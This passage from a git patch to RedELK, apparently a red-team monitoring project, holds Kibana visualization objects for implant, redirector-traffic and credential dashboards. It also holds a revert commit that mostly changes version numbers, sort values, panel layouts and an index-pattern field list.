\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic All\"}"}, "coreMigrationVersion": "7.16.3", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 187], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Implant per top users with computers", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"horizontal_bar\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":50,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Computername\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":200},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-2\",\"name\":\"BottomAxis-1\",\"type\":\"value\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":75,\"filter\":true,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-2\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Implant per top users with computers\"}"}, "coreMigrationVersion": "7.16.3", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 190], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Total hits\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":true,\"otherBucketLabel\":\"Other IPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Alarmed IPs\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Total hits\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Total hits\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Redirector traffic alarmed IP over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 192], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":64,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Tactics tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 194], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials per realm tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"creds.realm.keyword\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Credentials per realm tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 196], "type": "visualization", "version": "1"} \ No newline at end of file From 3febd48e2f77f1cc157a720b4b04bbe3d85accf1 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Sun, 20 Feb 2022 14:56:38 +0100 Subject: [PATCH 17/18] Revert "Bog update on ES and Kibana templates" This reverts commit 22fdc4cb3db957461c6a0d864576378492db63ce. --- .../diff/redelk_kibana_dashboard.json | 163 +++-- ...lk_kibana_index-pattern_.siem-signals.json | 6 +- ...redelk_kibana_index-pattern_bluecheck.json | 613 +++++++++++++++++- ...delk_kibana_index-pattern_credentials.json | 6 +- .../redelk_kibana_index-pattern_email.json | 6 +- ...edelk_kibana_index-pattern_implantsdb.json | 6 +- .../redelk_kibana_index-pattern_redelk.json | 6 +- ...elk_kibana_index-pattern_redirtraffic.json | 6 +- .../redelk_kibana_index-pattern_rtops.json | 6 +- .../templates/diff/redelk_kibana_search.json | 96 +-- .../diff/redelk_kibana_visualization.json | 282 ++++---- ...delk_elasticsearch_template_bluecheck.json | 45 +- ...k_elasticsearch_template_redirtraffic.json | 24 - .../templates/redelk_kibana_dashboard.ndjson | 24 +- ..._kibana_index-pattern_.siem-signals.ndjson | 2 +- ...delk_kibana_index-pattern_bluecheck.ndjson | 2 +- ...lk_kibana_index-pattern_credentials.ndjson | 2 +- .../redelk_kibana_index-pattern_email.ndjson | 2 +- ...elk_kibana_index-pattern_implantsdb.ndjson | 2 +- ..._kibana_index-pattern_redelk-iplist.ndjson | 2 +- .../redelk_kibana_index-pattern_redelk.ndjson | 2 +- ...k_kibana_index-pattern_redirtraffic.ndjson | 2 +- .../redelk_kibana_index-pattern_rtops.ndjson | 2 +- .../templates/redelk_kibana_search.ndjson | 32 +- .../redelk_kibana_visualization.ndjson | 94 +-- 25 files changed, 979 insertions(+), 454 deletions(-) diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json index 27348d65..60590cb9 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json @@ -221,7 +221,7 @@ "title": "RedELK - Summary dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -289,8 +289,8 @@ } ], "sort": [ - 1642171876916, - 34 + 1642152857910, + 2054 ], "type": "dashboard", "version": "1" @@ -401,7 +401,7 @@ "title": "RedELK - Red Team Operations", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -434,8 +434,8 @@ } ], "sort": [ - 1642171876916, - 40 + 1642152857910, + 2060 ], "type": "dashboard", "version": "1" @@ -547,7 +547,7 @@ "title": "RedELK - Tasks", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -580,8 +580,8 @@ } ], "sort": [ - 1642171876916, - 46 + 1642152857910, + 2066 ], "type": "dashboard", "version": "1" @@ -653,7 +653,7 @@ "enhancements": {} }, "gridData": { - "h": 4, + "h": 2, "i": "948c1286-d4de-44a6-8fb2-95bf9252ed00", "w": 48, "x": 0, @@ -662,7 +662,7 @@ "panelIndex": "948c1286-d4de-44a6-8fb2-95bf9252ed00", "panelRefName": "panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization", - "version": "7.16.3" + "version": "7.10.0" }, { "embeddableConfig": { @@ -674,34 +674,31 @@ "i": "ab9eb0fb-a164-4295-8177-865a2a67dccb", "w": 36, "x": 0, - "y": 4 + "y": 2 }, "panelIndex": "ab9eb0fb-a164-4295-8177-865a2a67dccb", "panelRefName": "panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "title": "Filters", "type": "visualization", - "version": "7.16.3" + "version": "7.10.0" }, { "embeddableConfig": { "enhancements": {}, - "hidePanelTitles": false, - "vis": { - "legendOpen": true - } + "hidePanelTitles": false }, "gridData": { "h": 5, "i": "c630a33e-6a98-466d-8223-fd83e6947b8c", "w": 12, "x": 36, - "y": 4 + "y": 2 }, "panelIndex": "c630a33e-6a98-466d-8223-fd83e6947b8c", "panelRefName": "panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "title": "HTTP Redir traffic per backend", "type": "visualization", - "version": "7.16.3" + "version": "7.10.0" }, { "embeddableConfig": { @@ -721,13 +718,13 @@ "i": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "w": 24, "x": 0, - "y": 9 + "y": 7 }, "panelIndex": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "panelRefName": "panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "title": "HTTP redir traffic map", "type": "map", - "version": "7.16.3" + "version": "7.10.0" }, { "embeddableConfig": { @@ -739,13 +736,13 @@ "i": "fc254327-57ac-4e5f-88f7-a32d48570289", "w": 24, "x": 24, - "y": 9 + "y": 7 }, "panelIndex": "fc254327-57ac-4e5f-88f7-a32d48570289", "panelRefName": "panel_fc254327-57ac-4e5f-88f7-a32d48570289", "title": "HTTP Redir traffic over time", "type": "visualization", - "version": "7.16.3" + "version": "7.10.0" }, { "embeddableConfig": { @@ -756,12 +753,12 @@ "i": "829f61cf-9374-4bb5-8214-34e6875e79da", "w": 24, "x": 0, - "y": 24 + "y": 22 }, "panelIndex": "829f61cf-9374-4bb5-8214-34e6875e79da", "panelRefName": "panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization", - "version": "7.16.3" + "version": "7.10.0" }, { "embeddableConfig": { @@ -772,12 +769,12 @@ "i": "0bc5f60b-f940-451a-886b-edff3512d180", "w": 48, "x": 0, - "y": 39 + "y": 37 }, "panelIndex": "0bc5f60b-f940-451a-886b-edff3512d180", "panelRefName": "panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search", - "version": "7.16.3" + "version": "7.10.0" } ], "refreshInterval": { @@ -790,7 +787,7 @@ "title": "RedELK - Traffic dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": { "dashboard": "7.16.0" @@ -843,8 +840,8 @@ } ], "sort": [ - 1643016059071, - 291 + 1642152857910, + 2076 ], "type": "dashboard", "version": "1" @@ -1034,7 +1031,7 @@ "title": "RedELK - Implants dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": { "dashboard": "7.16.0" @@ -1087,8 +1084,8 @@ } ], "sort": [ - 1642171876916, - 56 + 1642152857910, + 2086 ], "type": "dashboard", "version": "1" @@ -1214,7 +1211,7 @@ "title": "RedELK - MITRE ATT&CK", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1252,8 +1249,8 @@ } ], "sort": [ - 1642171876916, - 63 + 1642152857910, + 2093 ], "type": "dashboard", "version": "1" @@ -1401,7 +1398,7 @@ "title": "RedELK - Health", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": { "dashboard": "7.16.0" @@ -1444,8 +1441,8 @@ } ], "sort": [ - 1642171876916, - 71 + 1642152857910, + 2101 ], "type": "dashboard", "version": "1" @@ -1589,7 +1586,7 @@ "title": "RedELK - Alarms dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1632,8 +1629,8 @@ } ], "sort": [ - 1642171876916, - 79 + 1642152857910, + 2109 ], "type": "dashboard", "version": "1" @@ -1661,7 +1658,7 @@ "enhancements": {} }, "gridData": { - "h": 3, + "h": 2, "i": "80f94a01-4e80-42c2-b67e-971bab6e0526", "w": 48, "x": 0, @@ -1670,7 +1667,23 @@ "panelIndex": "80f94a01-4e80-42c2-b67e-971bab6e0526", "panelRefName": "panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization", - "version": "7.16.3" + "version": "7.8.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 11, + "i": "55aca97f-b1f0-43b1-af44-756fe59be5fc", + "w": 17, + "x": 31, + "y": 2 + }, + "panelIndex": "55aca97f-b1f0-43b1-af44-756fe59be5fc", + "panelRefName": "panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", + "type": "visualization", + "version": "7.8.0" }, { "embeddableConfig": { @@ -1681,12 +1694,12 @@ "i": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "w": 24, "x": 0, - "y": 3 + "y": 2 }, "panelIndex": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "panelRefName": "panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization", - "version": "7.16.3" + "version": "7.8.0" }, { "embeddableConfig": { @@ -1697,28 +1710,12 @@ "i": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "w": 7, "x": 24, - "y": 3 + "y": 2 }, "panelIndex": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "panelRefName": "panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization", - "version": "7.16.3" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 11, - "i": "55aca97f-b1f0-43b1-af44-756fe59be5fc", - "w": 17, - "x": 31, - "y": 3 - }, - "panelIndex": "55aca97f-b1f0-43b1-af44-756fe59be5fc", - "panelRefName": "panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", - "type": "visualization", - "version": "7.16.3" + "version": "7.8.0" }, { "embeddableConfig": { @@ -1737,19 +1734,19 @@ "i": "9a987436-c698-4236-9b92-bfab81de8cc1", "w": 48, "x": 0, - "y": 14 + "y": 13 }, "panelIndex": "9a987436-c698-4236-9b92-bfab81de8cc1", "panelRefName": "panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search", - "version": "7.16.3" + "version": "7.8.0" } ], "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1760,6 +1757,11 @@ "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization" }, + { + "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", + "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", + "type": "visualization" + }, { "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", @@ -1770,11 +1772,6 @@ "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization" }, - { - "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", - "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", - "type": "visualization" - }, { "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", @@ -1782,8 +1779,8 @@ } ], "sort": [ - 1643016103992, - 297 + 1642152857910, + 2115 ], "type": "dashboard", "version": "1" @@ -1894,7 +1891,7 @@ "title": "RedELK - Credentials dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1927,8 +1924,8 @@ } ], "sort": [ - 1642171876916, - 85 + 1642152857910, + 2121 ], "type": "dashboard", "version": "1" @@ -2038,7 +2035,7 @@ "title": "RedELK - IOC dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -2071,8 +2068,8 @@ } ], "sort": [ - 1642171876916, - 91 + 1642152857910, + 2127 ], "type": "dashboard", "version": "1" @@ -2183,7 +2180,7 @@ "title": "RedELK - Screenshots dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -2216,8 +2213,8 @@ } ], "sort": [ - 1642171876916, - 97 + 1642152857910, + 2133 ], "type": "dashboard", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json index dc33d315..d176cab9 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json @@ -8669,15 +8669,15 @@ "timeFieldName": "@timestamp", "title": ".siem-signals-*" }, - "coreMigrationVersion": "7.16.3", + "coreMigrationVersion": "7.16.2", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642171872765, - 241 + 1642152853649, + 1942 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json index 4719cde1..a1107ee2 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json @@ -1,22 +1,617 @@ [ { "attributes": { - "fieldAttrs": "{\"bluecheck.sectools.Product\":{\"count\":1},\"bluechecktype\":{\"count\":1}}", - "fields": [], - "runtimeFieldMap": "{}", + "fieldFormatMap": "{\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", + "fields": [ + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "@timestamp", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "@version", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "@version.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "@version" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_id" + ], + "name": "_id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_index" + ], + "name": "_index", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "name": "_score", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "number" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "_source" + ], + "name": "_source", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "_source" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_type" + ], + "name": "_type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "bluechecktimestamp", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "bluechecktimestamp.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "bluechecktimestamp" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "text", + "keyword" + ], + "name": "bluechecktype", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "bluechecktype.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "bluechecktype" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "text", + "keyword" + ], + "name": "classifier", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "classifier.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "classifier" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "text", + "keyword" + ], + "name": "domain", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "domain.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "domain" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "ecs.version", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "ecs.version.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "ecs.version" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "event.type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.type.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "event.type" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "implant.id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.id.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "implant.id" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "implant.log_file", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.log_file.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "implant.log_file" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": 